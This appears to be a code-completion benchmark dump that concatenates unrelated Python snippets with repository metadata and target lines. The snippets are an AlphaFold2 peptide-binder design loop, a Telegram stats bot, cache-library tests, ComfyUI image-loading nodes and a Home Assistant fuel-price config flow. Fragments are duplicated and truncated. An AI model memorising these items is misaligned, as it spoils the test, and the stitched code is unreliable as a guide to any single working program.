self.chain_Ls = [self.binder_length, self.target_length]
self.init_bound_seq = self.init_binder_seq + self.target_seq
self.bound_length = len(self.init_bound_seq)
# Initialize current and try sequences,
self.current_binder_seq = self.init_binder_seq
self.try_binder_seq = self.init_binder_seq
self.current_bound_seq = self.init_bound_seq
self.try_seq = self.init_bound_seq
self.name=name
def init_scores(self, scores):
'''Initalise scores'''
self.init_scores = scores
self.current_scores = scores
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores. '''
self.current_scores = self.try_scores
def assign_scores(self, scores):
'''Assign try scores. '''
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores.'''
self.current_scores = copy.deepcopy(self.try_scores)
@hydra.main(version_base=None, config_path='config', config_name='base')
def main(conf: HydraConfig) -> None:
"""
Main function for running peptide binder hallucination.
"""
input_conf=conf.input
output_conf=conf.output
loss_conf=conf.loss
model_conf=conf.model
hallucination_conf=conf.hallucination
os.makedirs(output_conf.out_dir, exist_ok=True)
if output_conf.cautious and os.path.exists(f'{output_conf.out_dir}/{output_conf.out_prefix}_step_00000.pdb'):
sys.exit(f'Specified output already exists. Exiting. To overwrite, provide output.cautious=False')
AA_freq=util.get_aa_freq(AA_FREQ, hallucination_conf.exclude_AA)
# Initialize BoundComplex object
boundcomplex = BoundComplex(target_sequence=input_conf.target_sequence, name=conf.output.out_prefix, length=input_conf.binder_length, aa_freq=AA_freq, binder_sequence=input_conf.binder_sequence)
# Setup AlphaFold2 models.
model_runners= setup_models(['complex'], model_id=model_conf.model, recycles=model_conf.recycles)
# Initialize MCMC
M, current_loss, current_scores = util.initialize_MCMC(conf)
# Initialize output file
util.initialize_score_file(conf)
# Run the hallucination trajectory
for i in range(hallucination_conf.steps):
# Update a few things.
T = hallucination_conf.T_init * (np.exp(np.log(0.5) / hallucination_conf.half_life) ** i) # update temperature
n_mutations = round(M[i]) # update mutation rate
if i == 0:
# Do initial prediction without mutations
print(f"{'-'*100}")
print('Starting...')
af2_prediction= predict_structure(boundcomplex,
single_chain=False,
model_runner=model_runners['complex'],
random_seed=0)
boundcomplex.init_prediction(af2_prediction)
|
class BoundComplex(Protomers, Oligomer):
'''
Class for keeping track of binder sequence and complex predictions
during binder hallucination.
'''
def __init__(self, target_sequence: str, name, length=70, aa_freq={}, binder_sequence=None):
"""
target_sequence: amino acid sequence of target peptide (to bind)
length: length of binder peptide
binder_sequence: Optional, starting amino acid sequence of the binder
aa_freq: dictonary containing the frequencies of each aa
"""
self.target_seq = target_sequence.upper()
assert len(self.target_seq) > 0, "Target sequence must be provided"
self.length = int(length)
self.aa_freq = aa_freq
# Get initial binder sequence
if binder_sequence:
assert self.length > 0, "Binder length must be greater than 0"
self.init_binder_seq = binder_sequence.upper()
else:
self.init_binder_seq = ''.join(np.random.choice(list(aa_freq.keys()), size = length, p=list(aa_freq.values())))
self.binder_length = len(self.init_binder_seq)
self.target_length = len(self.target_seq)
self.chain_Ls = [self.binder_length, self.target_length]
self.init_bound_seq = self.init_binder_seq + self.target_seq
self.bound_length = len(self.init_bound_seq)
# Initialize current and try sequences,
self.current_binder_seq = self.init_binder_seq
self.try_binder_seq = self.init_binder_seq
self.current_bound_seq = self.init_bound_seq
self.try_seq = self.init_bound_seq
self.name=name
def init_scores(self, scores):
'''Initalise scores'''
self.init_scores = scores
self.current_scores = scores
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores. '''
self.current_scores = self.try_scores
def assign_scores(self, scores):
'''Assign try scores. '''
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores.'''
self.current_scores = copy.deepcopy(self.try_scores)
@hydra.main(version_base=None, config_path='config', config_name='base')
def main(conf: HydraConfig) -> None:
"""
Main function for running peptide binder hallucination.
"""
input_conf=conf.input
output_conf=conf.output
loss_conf=conf.loss
model_conf=conf.model
hallucination_conf=conf.hallucination
os.makedirs(output_conf.out_dir, exist_ok=True)
if output_conf.cautious and os.path.exists(f'{output_conf.out_dir}/{output_conf.out_prefix}_step_00000.pdb'):
sys.exit(f'Specified output already exists. Exiting. To overwrite, provide output.cautious=False')
AA_freq=util.get_aa_freq(AA_FREQ, hallucination_conf.exclude_AA)
# Initialize BoundComplex object
boundcomplex = BoundComplex(target_sequence=input_conf.target_sequence, name=conf.output.out_prefix, length=input_conf.binder_length, aa_freq=AA_freq, binder_sequence=input_conf.binder_sequence)
# Setup AlphaFold2 models.
model_runners= setup_models(['complex'], model_id=model_conf.model, recycles=model_conf.recycles)
# Initialize MCMC
M, current_loss, current_scores = util.initialize_MCMC(conf)
# Initialize output file
util.initialize_score_file(conf)
# Run the hallucination trajectory
for i in range(hallucination_conf.steps):
# Update a few things.
T = hallucination_conf.T_init * (np.exp(np.log(0.5) / hallucination_conf.half_life) ** i) # update temperature
n_mutations = round(M[i]) # update mutation rate
if i == 0:
# Do initial prediction without mutations
print(f"{'-'*100}")
print('Starting...')
af2_prediction= predict_structure(boundcomplex,
single_chain=False,
model_runner=model_runners['complex'],
random_seed=0)
boundcomplex.init_prediction(af2_prediction) | try_loss, try_scores = compute_loss(loss_conf, boundcomplex) | 2 | 2023-12-21 12:07:25+00:00 | 4k |
Dank-del/stats-bot | stats_bot/__main__.py | [
{
"identifier": "start",
"path": "stats_bot/handlers/start.py",
"snippet": "async def start(update: Update, _: ContextTypes.DEFAULT_TYPE) -> None:\n \"\"\"\n Sends a welcome message to the user.\n\n Args:\n update (Update): The update object containing information about the incoming mess... | from telegram.ext import (
ApplicationBuilder,
CommandHandler,
MessageHandler,
filters,
)
from stats_bot.handlers.start import start
from stats_bot.handlers.group import handle_update
from stats_bot.handlers.plot import attachment_stats, plot_table
import logging, configparser
import stats_bot.db.client as client | 1,855 |
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
)
logging.getLogger(__name__)
configparser = configparser.ConfigParser()
configparser.read("config.ini")
app = (
ApplicationBuilder().token(configparser.get("stats_bot", "token")).build()
)
app.add_handler(CommandHandler("start", start, filters=filters.ChatType.PRIVATE))
|
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
)
logging.getLogger(__name__)
configparser = configparser.ConfigParser()
configparser.read("config.ini")
app = (
ApplicationBuilder().token(configparser.get("stats_bot", "token")).build()
)
app.add_handler(CommandHandler("start", start, filters=filters.ChatType.PRIVATE)) | app.add_handler(CommandHandler("attachmentstats", attachment_stats, filters=filters.ChatType.GROUPS)) | 2 | 2023-12-18 03:05:36+00:00 | 4k |
EzyGang/py-cachify | tests/test_backend.py | [
{
"identifier": "AsyncWrapper",
"path": "py_cachify/backend/clients.py",
"snippet": "class AsyncWrapper:\n def __init__(self, cache: MemoryCache) -> None:\n self._cache = cache\n\n async def get(self, name: str, default: Any = None) -> Any:\n return self._cache.get(name=name, default... | import time
import pytest
import py_cachify.backend.lib
from pytest_mock import MockerFixture
from py_cachify.backend.clients import AsyncWrapper, MemoryCache
from py_cachify.backend.exceptions import CachifyInitError
from py_cachify.backend.lib import Cachify, get_cachify | 1,777 | @pytest.fixture
def async_wrapper(memory_cache):
return AsyncWrapper(memory_cache)
@pytest.fixture
def cachify(memory_cache, async_wrapper):
return Cachify(sync_client=memory_cache, async_client=async_wrapper, prefix='_PYC_')
def test_memory_cache_set_and_get(memory_cache):
memory_cache.set('key', 'value', ex=10)
assert memory_cache.get('key') == 'value'
def test_memory_cache_set_and_get_with_expiry(memory_cache):
memory_cache.set('key', 'value', ex=-1)
assert memory_cache.get('key') is None
def test_memory_cache_get_with_default(memory_cache):
assert memory_cache.get('nonexistent_key', default='default_value') == 'default_value'
def test_memory_cache_delete(memory_cache):
memory_cache.set('key', 'value')
memory_cache.delete('key')
assert memory_cache.get('key') is None
@pytest.mark.asyncio
async def test_async_wrapper_get(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
async_wrapper._cache.set('key', 'value', ex=10)
result = await async_wrapper.get('key')
assert result == 'value'
@pytest.mark.asyncio
async def test_async_wrapper_get_with_default(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
result = await async_wrapper.get('nonexistent_key', default='default_value')
assert result == 'default_value'
@pytest.mark.asyncio
async def test_async_wrapper_delete(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
async_wrapper._cache.set('key', 'value')
await async_wrapper.delete('key', 'nonexistent_key')
assert async_wrapper._cache.get('key') is None
@pytest.mark.asyncio
async def test_async_wrapper_set(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
await async_wrapper.set('key', 'value', ex=10)
assert async_wrapper._cache.get('key') == 'value'
def test_cachify_set_and_get(cachify):
cachify.set('key', 'value', ttl=10)
assert cachify.get('key') == 'value'
def test_cachify_set_and_get_with_ttl(cachify):
cachify.set('key', 'value', ttl=-1)
assert cachify.get('key') is None
def test_cachify_get_with_nonexistent_key(cachify):
assert cachify.get('nonexistent_key') is None
def test_cachify_get(cachify):
cachify.set('key', 'value')
result = cachify.get('key')
assert result == 'value'
def test_cachify_delete(cachify):
cachify.set('key', 'value')
cachify.delete('key')
assert cachify.get('key') is None
@pytest.mark.asyncio
async def test_cachify_a_get(cachify):
cachify.set('key', 'value')
result = await cachify.a_get('key')
assert result == 'value'
@pytest.mark.asyncio
async def test_cachify_a_get_with_nonexistent_key(cachify):
result = await cachify.a_get('nonexistent_key')
assert result is None
@pytest.mark.asyncio
async def test_cachify_a_delete(cachify):
cachify.set('key', 'value')
await cachify.a_delete('key')
assert cachify.get('key') is None
@pytest.mark.asyncio
async def test_cachify_a_set(cachify):
await cachify.a_set('key', 'value')
assert cachify.get('key') == 'value'
def test_init_cachify(init_cachify_fixture):
assert py_cachify.backend.lib._cachify is not None
def test_get_cachify_raises_error():
with pytest.raises(CachifyInitError, match='Cachify is not initialized, did you forget to call `init_cachify`?'):
|
@pytest.fixture
def memory_cache():
return MemoryCache()
@pytest.fixture
def async_wrapper(memory_cache):
return AsyncWrapper(memory_cache)
@pytest.fixture
def cachify(memory_cache, async_wrapper):
return Cachify(sync_client=memory_cache, async_client=async_wrapper, prefix='_PYC_')
def test_memory_cache_set_and_get(memory_cache):
memory_cache.set('key', 'value', ex=10)
assert memory_cache.get('key') == 'value'
def test_memory_cache_set_and_get_with_expiry(memory_cache):
memory_cache.set('key', 'value', ex=-1)
assert memory_cache.get('key') is None
def test_memory_cache_get_with_default(memory_cache):
assert memory_cache.get('nonexistent_key', default='default_value') == 'default_value'
def test_memory_cache_delete(memory_cache):
memory_cache.set('key', 'value')
memory_cache.delete('key')
assert memory_cache.get('key') is None
@pytest.mark.asyncio
async def test_async_wrapper_get(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
async_wrapper._cache.set('key', 'value', ex=10)
result = await async_wrapper.get('key')
assert result == 'value'
@pytest.mark.asyncio
async def test_async_wrapper_get_with_default(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
result = await async_wrapper.get('nonexistent_key', default='default_value')
assert result == 'default_value'
@pytest.mark.asyncio
async def test_async_wrapper_delete(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
async_wrapper._cache.set('key', 'value')
await async_wrapper.delete('key', 'nonexistent_key')
assert async_wrapper._cache.get('key') is None
@pytest.mark.asyncio
async def test_async_wrapper_set(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
await async_wrapper.set('key', 'value', ex=10)
assert async_wrapper._cache.get('key') == 'value'
def test_cachify_set_and_get(cachify):
cachify.set('key', 'value', ttl=10)
assert cachify.get('key') == 'value'
def test_cachify_set_and_get_with_ttl(cachify):
cachify.set('key', 'value', ttl=-1)
assert cachify.get('key') is None
def test_cachify_get_with_nonexistent_key(cachify):
assert cachify.get('nonexistent_key') is None
def test_cachify_get(cachify):
cachify.set('key', 'value')
result = cachify.get('key')
assert result == 'value'
def test_cachify_delete(cachify):
cachify.set('key', 'value')
cachify.delete('key')
assert cachify.get('key') is None
@pytest.mark.asyncio
async def test_cachify_a_get(cachify):
cachify.set('key', 'value')
result = await cachify.a_get('key')
assert result == 'value'
@pytest.mark.asyncio
async def test_cachify_a_get_with_nonexistent_key(cachify):
result = await cachify.a_get('nonexistent_key')
assert result is None
@pytest.mark.asyncio
async def test_cachify_a_delete(cachify):
cachify.set('key', 'value')
await cachify.a_delete('key')
assert cachify.get('key') is None
@pytest.mark.asyncio
async def test_cachify_a_set(cachify):
await cachify.a_set('key', 'value')
assert cachify.get('key') == 'value'
def test_init_cachify(init_cachify_fixture):
assert py_cachify.backend.lib._cachify is not None
def test_get_cachify_raises_error():
with pytest.raises(CachifyInitError, match='Cachify is not initialized, did you forget to call `init_cachify`?'): | get_cachify() | 4 | 2023-12-16 22:54:51+00:00 | 4k |
lldacing/comfyui-easyapi-nodes | easyapi/ImageNode.py | [
{
"identifier": "tensor_to_pil",
"path": "easyapi/util.py",
"snippet": "def tensor_to_pil(image):\n return Image.fromarray(np.clip(255. * image.cpu().numpy().squeeze(), 0, 255).astype(np.uint8))"
},
{
"identifier": "pil_to_tensor",
"path": "easyapi/util.py",
"snippet": "def pil_to_ten... | import base64
import copy
import io
import numpy as np
import torch
import json
from PIL import ImageOps, Image
from nodes import LoadImage
from comfy.cli_args import args
from PIL.PngImagePlugin import PngInfo
from json import JSONEncoder, JSONDecoder
from easyapi.util import tensor_to_pil, pil_to_tensor, base64_to_image, image_to_base64, read_image_from_url
| 1,786 | """
_color_channels = ["red", "green", "blue", "alpha"]
@classmethod
def INPUT_TYPES(self):
return {
"required": {
"urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
"channel": (self._color_channels, {"default": self._color_channels[0]}),
},
}
RETURN_TYPES = ("MASK", )
RETURN_NAMES = ("masks", )
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True,)
def convert(self, urls, channel=_color_channels[0]):
urls = urls.splitlines()
masks = []
for url in urls:
if not url.strip().isspace():
i = read_image_from_url(url.strip())
# 下面代码参考LoadImage
i = ImageOps.exif_transpose(i)
if i.getbands() != ("R", "G", "B", "A"):
i = i.convert("RGBA")
c = channel[0].upper()
if c in i.getbands():
mask = np.array(i.getchannel(c)).astype(np.float32) / 255.0
mask = torch.from_numpy(mask)
if c == 'A':
mask = 1. - mask
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
masks.append(mask)
return (masks,)
class Base64ToImage:
"""
图片的base64格式还原成图片的张量
"""
@classmethod
def INPUT_TYPES(self):
return {"required": {
"base64Images": ("STRING", {"multiline": True, "default": "[\"\"]", "dynamicPrompts": False}),
},
}
RETURN_TYPES = ("IMAGE", "MASK")
# RETURN_NAMES = ("image", "mask")
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True)
def convert(self, base64Images):
# print(base64Image)
base64ImageJson = JSONDecoder().decode(s=base64Images)
images = []
masks = []
for base64Image in base64ImageJson:
i = base64_to_image(base64Image)
# 下面代码参考LoadImage
i = ImageOps.exif_transpose(i)
image = i.convert("RGB")
image = np.array(image).astype(np.float32) / 255.0
image = torch.from_numpy(image)[None, ]
if 'A' in i.getbands():
mask = np.array(i.getchannel('A')).astype(np.float32) / 255.0
mask = 1. - torch.from_numpy(mask)
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
images.append(image)
masks.append(mask.unsqueeze(0))
return (images, masks,)
class ImageToBase64Advanced:
def __init__(self):
self.imageType = "image"
@classmethod
def INPUT_TYPES(self):
return {"required": {
"images": ("IMAGE",),
"imageType": (["image", "mask"], {"default": "image"}),
},
"hidden": {"prompt": "PROMPT", "extra_pnginfo": "EXTRA_PNGINFO"},
}
RETURN_TYPES = ("STRING",)
RETURN_NAMES = ("base64Images",)
FUNCTION = "convert"
# 作为输出节点,返回数据格式是{"ui": {output_name:value}, "result": (value,)}
# ui中是websocket返回给前端的内容,result是py执行传给下个节点用的
OUTPUT_NODE = True
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
# OUTPUT_IS_LIST = (False,False,)
def convert(self, images, imageType=None, prompt=None, extra_pnginfo=None):
if imageType is None:
imageType = self.imageType
result = list()
for i in images:
|
class LoadImageFromURL:
"""
从远程地址读取图片
"""
@classmethod
def INPUT_TYPES(self):
return {"required": {
"urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
},
}
RETURN_TYPES = ("IMAGE", "MASK")
RETURN_NAMES = ("images", "masks")
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True,)
def convert(self, urls):
urls = urls.splitlines()
images = []
masks = []
for url in urls:
if not url.strip().isspace():
i = read_image_from_url(url.strip())
i = ImageOps.exif_transpose(i)
image = i.convert("RGB")
image = pil_to_tensor(image)
images.append(image)
if 'A' in i.getbands():
mask = np.array(i.getchannel('A')).astype(np.float32) / 255.0
mask = 1. - torch.from_numpy(mask)
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
masks.append(mask)
return (images, masks, )
class LoadMaskFromURL:
"""
从远程地址读取图片
"""
_color_channels = ["red", "green", "blue", "alpha"]
@classmethod
def INPUT_TYPES(self):
return {
"required": {
"urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
"channel": (self._color_channels, {"default": self._color_channels[0]}),
},
}
RETURN_TYPES = ("MASK", )
RETURN_NAMES = ("masks", )
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True,)
def convert(self, urls, channel=_color_channels[0]):
urls = urls.splitlines()
masks = []
for url in urls:
if not url.strip().isspace():
i = read_image_from_url(url.strip())
# 下面代码参考LoadImage
i = ImageOps.exif_transpose(i)
if i.getbands() != ("R", "G", "B", "A"):
i = i.convert("RGBA")
c = channel[0].upper()
if c in i.getbands():
mask = np.array(i.getchannel(c)).astype(np.float32) / 255.0
mask = torch.from_numpy(mask)
if c == 'A':
mask = 1. - mask
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
masks.append(mask)
return (masks,)
class Base64ToImage:
"""
图片的base64格式还原成图片的张量
"""
@classmethod
def INPUT_TYPES(self):
return {"required": {
"base64Images": ("STRING", {"multiline": True, "default": "[\"\"]", "dynamicPrompts": False}),
},
}
RETURN_TYPES = ("IMAGE", "MASK")
# RETURN_NAMES = ("image", "mask")
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True)
def convert(self, base64Images):
# print(base64Image)
base64ImageJson = JSONDecoder().decode(s=base64Images)
images = []
masks = []
for base64Image in base64ImageJson:
i = base64_to_image(base64Image)
# 下面代码参考LoadImage
i = ImageOps.exif_transpose(i)
image = i.convert("RGB")
image = np.array(image).astype(np.float32) / 255.0
image = torch.from_numpy(image)[None, ]
if 'A' in i.getbands():
mask = np.array(i.getchannel('A')).astype(np.float32) / 255.0
mask = 1. - torch.from_numpy(mask)
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
images.append(image)
masks.append(mask.unsqueeze(0))
return (images, masks,)
class ImageToBase64Advanced:
def __init__(self):
self.imageType = "image"
@classmethod
def INPUT_TYPES(self):
return {"required": {
"images": ("IMAGE",),
"imageType": (["image", "mask"], {"default": "image"}),
},
"hidden": {"prompt": "PROMPT", "extra_pnginfo": "EXTRA_PNGINFO"},
}
RETURN_TYPES = ("STRING",)
RETURN_NAMES = ("base64Images",)
FUNCTION = "convert"
# 作为输出节点,返回数据格式是{"ui": {output_name:value}, "result": (value,)}
# ui中是websocket返回给前端的内容,result是py执行传给下个节点用的
OUTPUT_NODE = True
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
# OUTPUT_IS_LIST = (False,False,)
def convert(self, images, imageType=None, prompt=None, extra_pnginfo=None):
if imageType is None:
imageType = self.imageType
result = list()
for i in images:
| img = tensor_to_pil(i)
| 0 | 2023-12-19 02:32:10+00:00 | 4k |
pantherale0/ha-fuelprices | custom_components/fuel_prices/config_flow.py | [
{
"identifier": "DOMAIN",
"path": "custom_components/fuel_prices/const.py",
"snippet": "DOMAIN = \"fuel_prices\""
},
{
"identifier": "NAME",
"path": "custom_components/fuel_prices/const.py",
"snippet": "NAME = \"Fuel Prices\""
},
{
"identifier": "CONF_AREAS",
"path": "custom_... | import logging
import voluptuous as vol
from typing import Any
from homeassistant.config_entries import ConfigEntry, OptionsFlow
from pyfuelprices.sources.mapping import SOURCE_MAP, COUNTRY_MAP
from homeassistant import config_entries
from homeassistant.data_entry_flow import FlowResult
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import selector
from homeassistant.helpers import config_validation as cv
from homeassistant.core import callback
from homeassistant.const import (
CONF_LATITUDE,
CONF_LONGITUDE,
CONF_RADIUS,
CONF_NAME,
CONF_TIMEOUT,
CONF_SCAN_INTERVAL,
)
from .const import DOMAIN, NAME, CONF_AREAS, CONF_SOURCES | 2,065 | CONF_LATITUDE: user_input[CONF_LATITUDE],
CONF_LONGITUDE: user_input[CONF_LONGITUDE],
CONF_RADIUS: user_input[CONF_RADIUS],
}
)
return await self.async_step_area_menu()
return self.async_show_form(
step_id="area_create", data_schema=AREA_SCHEMA, errors=errors
)
async def async_step_area_update_select(
self, user_input: dict[str, Any] | None = None
):
"""Show a menu to allow the user to select what option to update."""
if user_input is not None:
for i, data in enumerate(self.configured_areas):
if self.configured_areas[i]["name"] == user_input[CONF_NAME]:
self.configuring_area = data
self.configuring_index = i
break
return await self.async_step_area_update()
if len(self.configured_areas) > 0:
return self.async_show_form(
step_id="area_update_select",
data_schema=vol.Schema(
{
vol.Required(CONF_NAME): selector.SelectSelector(
selector.SelectSelectorConfig(
mode=selector.SelectSelectorMode.LIST,
options=self.configured_area_names,
)
)
}
),
)
return await self.async_step_area_menu()
async def async_step_area_update(self, user_input: dict[str, Any] | None = None):
"""Handle an area update."""
errors: dict[str, str] = {}
if user_input is not None:
self.configured_areas.pop(self.configuring_index)
self.configured_areas.append(
{
CONF_NAME: user_input[CONF_NAME],
CONF_LATITUDE: user_input[CONF_LATITUDE],
CONF_LONGITUDE: user_input[CONF_LONGITUDE],
CONF_RADIUS: user_input[CONF_RADIUS],
}
)
return await self.async_step_area_menu()
return self.async_show_form(
step_id="area_update",
data_schema=vol.Schema(
{
vol.Required(
CONF_NAME, default=self.configuring_area[CONF_NAME]
): selector.TextSelector(),
vol.Required(
CONF_RADIUS, default=self.configuring_area[CONF_RADIUS]
): selector.NumberSelector(
selector.NumberSelectorConfig(
mode=selector.NumberSelectorMode.BOX,
unit_of_measurement="miles",
min=1,
max=50,
step=0.1,
)
),
vol.Inclusive(
CONF_LATITUDE,
"coordinates",
"Latitude and longitude must exist together",
default=self.configuring_area[CONF_LATITUDE],
): cv.latitude,
vol.Inclusive(
CONF_LONGITUDE,
"coordinates",
"Latitude and longitude must exist together",
default=self.configuring_area[CONF_LONGITUDE],
): cv.longitude,
}
),
errors=errors,
)
async def async_step_area_delete(self, user_input: dict[str, Any] | None = None):
"""Delete a configured area."""
if user_input is not None:
for i, data in enumerate(self.configured_areas):
if data["name"] == user_input[CONF_NAME]:
self.configured_areas.pop(i)
break
return await self.async_step_area_menu()
if len(self.configured_areas) > 0:
return self.async_show_form(
step_id="area_delete",
data_schema=vol.Schema(
{
vol.Required(CONF_NAME): selector.SelectSelector(
selector.SelectSelectorConfig(
mode=selector.SelectSelectorMode.LIST,
options=self.configured_area_names,
)
)
}
),
)
return await self.async_step_area_menu()
async def async_step_finished(self, user_input: dict[str, Any] | None = None):
"""Save configuration."""
errors: dict[str, str] = {}
if user_input is not None:
if len(self.configured_sources) > 0:
user_input[CONF_SOURCES] = self.configured_sources
elif self.hass.config.country is not None:
user_input[CONF_SOURCES] = COUNTRY_MAP.get(self.hass.config.country)
else:
user_input[CONF_SOURCES] = list(SOURCE_MAP)
| """Config flow for Fuel Prices."""
_LOGGER = logging.getLogger(__name__)
AREA_SCHEMA = vol.Schema(
{
vol.Required(CONF_NAME): selector.TextSelector(),
vol.Required(CONF_RADIUS, default=5.0): selector.NumberSelector(
selector.NumberSelectorConfig(
mode=selector.NumberSelectorMode.BOX,
unit_of_measurement="miles",
min=1,
max=50,
step=0.1,
)
),
vol.Inclusive(
CONF_LATITUDE, "coordinates", "Latitude and longitude must exist together"
): cv.latitude,
vol.Inclusive(
CONF_LONGITUDE, "coordinates", "Latitude and longitude must exist together"
): cv.longitude,
}
)
class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow."""
VERSION = 1
configured_areas: list[dict] = []
configured_sources = []
configuring_area = {}
configuring_index = -1
timeout = None
interval = None
@property
def configured_area_names(self) -> list[str]:
"""Return a list of area names."""
items = []
for area in self.configured_areas:
items.append(area["name"])
return items
async def async_step_user(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle the intial step."""
# only one config entry allowed
# users should use the options flow to adjust areas and sources.
await self.async_set_unique_id(NAME)
self._abort_if_unique_id_configured()
self.configured_areas = []
self.configured_sources = []
self.configuring_area = {}
self.configuring_index = -1
self.timeout = 10
self.interval = 1440
# add the home location as a default (this can optionally be removed).
self.configured_areas.append(
{
CONF_NAME: self.hass.config.location_name,
CONF_LATITUDE: self.hass.config.latitude,
CONF_LONGITUDE: self.hass.config.longitude,
CONF_RADIUS: 10.0,
}
)
return await self.async_step_main_menu()
async def async_step_main_menu(self, _: None = None):
"""Display configuration menu."""
return self.async_show_menu(
step_id="main_menu",
menu_options={
"area_menu": "Configure areas to create devices/sensors",
"sources": "Configure data collector sources",
"finished": "Complete setup",
},
)
async def async_step_sources(self, user_input: dict[str, Any] | None = None):
"""Set data source config."""
if user_input is not None:
self.configured_sources = user_input[CONF_SOURCES]
return await self.async_step_main_menu(None)
return self.async_show_form(
step_id="sources",
data_schema=vol.Schema(
{
vol.Optional(
CONF_SOURCES, default=self.configured_sources
): selector.SelectSelector(
selector.SelectSelectorConfig(
mode=selector.SelectSelectorMode.DROPDOWN,
options=list(SOURCE_MAP),
multiple=True,
)
),
vol.Optional(
CONF_TIMEOUT,
default=self.timeout,
): selector.NumberSelector(
selector.NumberSelectorConfig(
mode=selector.NumberSelectorMode.BOX,
min=5,
max=60,
unit_of_measurement="s",
)
),
vol.Optional(
CONF_SCAN_INTERVAL,
default=self.interval,
): selector.NumberSelector(
selector.NumberSelectorConfig(
mode=selector.NumberSelectorMode.BOX,
min=120,
max=1440,
unit_of_measurement="m",
)
),
}
),
)
async def async_step_area_menu(self, _: None = None) -> FlowResult:
"""Show the area menu."""
return self.async_show_menu(
step_id="area_menu",
menu_options={
"area_create": "Define a new area",
"area_update_select": "Update an area",
"area_delete": "Delete an area",
"main_menu": "Return to main menu",
},
)
async def async_step_area_create(self, user_input: dict[str, Any] | None = None):
"""Handle an area configuration."""
errors: dict[str, str] = {}
if user_input is not None:
self.configured_areas.append(
{
CONF_NAME: user_input[CONF_NAME],
CONF_LATITUDE: user_input[CONF_LATITUDE],
CONF_LONGITUDE: user_input[CONF_LONGITUDE],
CONF_RADIUS: user_input[CONF_RADIUS],
}
)
return await self.async_step_area_menu()
return self.async_show_form(
step_id="area_create", data_schema=AREA_SCHEMA, errors=errors
)
async def async_step_area_update_select(
self, user_input: dict[str, Any] | None = None
):
"""Show a menu to allow the user to select what option to update."""
if user_input is not None:
for i, data in enumerate(self.configured_areas):
if self.configured_areas[i]["name"] == user_input[CONF_NAME]:
self.configuring_area = data
self.configuring_index = i
break
return await self.async_step_area_update()
if len(self.configured_areas) > 0:
return self.async_show_form(
step_id="area_update_select",
data_schema=vol.Schema(
{
vol.Required(CONF_NAME): selector.SelectSelector(
selector.SelectSelectorConfig(
mode=selector.SelectSelectorMode.LIST,
options=self.configured_area_names,
)
)
}
),
)
return await self.async_step_area_menu()
async def async_step_area_update(self, user_input: dict[str, Any] | None = None):
"""Handle an area update."""
errors: dict[str, str] = {}
if user_input is not None:
self.configured_areas.pop(self.configuring_index)
self.configured_areas.append(
{
CONF_NAME: user_input[CONF_NAME],
CONF_LATITUDE: user_input[CONF_LATITUDE],
CONF_LONGITUDE: user_input[CONF_LONGITUDE],
CONF_RADIUS: user_input[CONF_RADIUS],
}
)
return await self.async_step_area_menu()
return self.async_show_form(
step_id="area_update",
data_schema=vol.Schema(
{
vol.Required(
CONF_NAME, default=self.configuring_area[CONF_NAME]
): selector.TextSelector(),
vol.Required(
CONF_RADIUS, default=self.configuring_area[CONF_RADIUS]
): selector.NumberSelector(
selector.NumberSelectorConfig(
mode=selector.NumberSelectorMode.BOX,
unit_of_measurement="miles",
min=1,
max=50,
step=0.1,
)
),
vol.Inclusive(
CONF_LATITUDE,
"coordinates",
"Latitude and longitude must exist together",
default=self.configuring_area[CONF_LATITUDE],
): cv.latitude,
vol.Inclusive(
CONF_LONGITUDE,
"coordinates",
"Latitude and longitude must exist together",
default=self.configuring_area[CONF_LONGITUDE],
): cv.longitude,
}
),
errors=errors,
)
async def async_step_area_delete(self, user_input: dict[str, Any] | None = None):
"""Delete a configured area."""
if user_input is not None:
for i, data in enumerate(self.configured_areas):
if data["name"] == user_input[CONF_NAME]:
self.configured_areas.pop(i)
break
return await self.async_step_area_menu()
if len(self.configured_areas) > 0:
return self.async_show_form(
step_id="area_delete",
data_schema=vol.Schema(
{
vol.Required(CONF_NAME): selector.SelectSelector(
selector.SelectSelectorConfig(
mode=selector.SelectSelectorMode.LIST,
options=self.configured_area_names,
)
)
}
),
)
return await self.async_step_area_menu()
async def async_step_finished(self, user_input: dict[str, Any] | None = None):
"""Save configuration."""
